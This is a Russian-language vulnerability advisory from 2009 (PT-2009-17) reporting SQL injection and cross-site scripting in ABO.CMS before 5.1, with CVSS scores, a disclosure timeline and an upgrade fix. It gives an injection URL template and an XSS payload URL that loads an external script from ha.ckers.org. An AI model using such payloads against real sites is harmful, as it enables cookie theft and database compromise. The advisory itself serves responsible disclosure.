PT-2009-17: Множественные уязвимости в ABO.CMS

Уязвимое ПО

ABO.CMS
Версии до 5.1

Ссылка на приложение:
http://abocms.ru

Рейтинг опасности

Уровень опасности: Высокий
Воздействие: Внедрение операторов SQL, Межсайтовое выполнение сценариев
Вектор атаки: Удаленный

CVSS v2

Base Score: 7.5
Temporal Score: 5.9
Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P/E:P/RL:O/RC:C)

CVE: отсутствует

Описание уязвимости

Positive Technologies Research Team обнаружили уязвимости внедрение операторов SQL и межсайтовое выполнение сценариевв в ABO.CMS.

Приложение недостаточно осуществляет проверку входных данных в параметре "news" в следствии чего возможно проведение атаки "Внедрение операторов SQL".

"Внедрение операторов SQL" – способ нападения на базу данных в обход межсетевой защиты. В этом методе, параметры, передаваемые к базе данных через Web приложения, изменяются таким образом, чтобы изменить выполняемый SQL запрос. Например, добавляя различные символы к параметру, можно выполнить дополнительный запрос совместно с первым.

Нападение может использоваться для следующих целей:

1. Получить доступ к данным, которые обычно недоступны, или получить данные конфигурации системы, которые могут использоваться для дальнейших нападений. Например, измененный запрос может возвратить хешированные пароли пользователей, которые в последствии могут быть расшифрованы методом перебора.

2. Получить доступ к компьютерам организации, через компьютер, на котором находится база данных. Это можно реализовать, используя процедуры базы данных и расширения 3GL языка, которые позволяют доступ к операционной системе.

Запрос для выполнения SQL инъекции:
http://[server]/about/news/?action=addtheme&news=SQL-code

Приложение недостаточно осуществляет проверку входных данных в параметре "fid". Злоумышленник может воспользоваться уязвимостью для внедрения и выполнения произвольного HTML кода и кода сценария в браузере пользователя в контексте безопасности уязвимого сайта.

Пример:
http://[server]/forum/?action=rules&fid=1%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E&start=1

Злоумышленник может внедрить произвольный JavaScript, VBScript, ActiveX, HTML или Flash и получить доступ к данным пользователя. Злоумышленник может похитить сессионный куки и получить доступ к учетной записи пользователя. Также существует возможность изменить содержимое страницы, отображаемой пользователю.

Решение

Установите последнюю версию приложения.

Статус уведомления

02.03.2009 - Производитель уведомлен
03.03.2009 - Получен ответ от производителя
04.03.2009 - Запрошен статус исправления
05.04.2009 - Производитель выпустил испраление
26.05.2009 - Разглашение уязвимости

Благодарности

Эту уязвимость обнаружил Дмитрий Евтеев (Positive Technologies Research Team) с помощью профессионального сетевого сканера безопасности MaxPatrol.

Ссылки

http://www.securitylab.ru/lab/PT-2009-17
http://www.ptsecurity.ru/advisory.asp

Список отчетов о ранее обнаруженных уязвимостях Positive Technologies Research Team:

http://www.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp

Уязвимости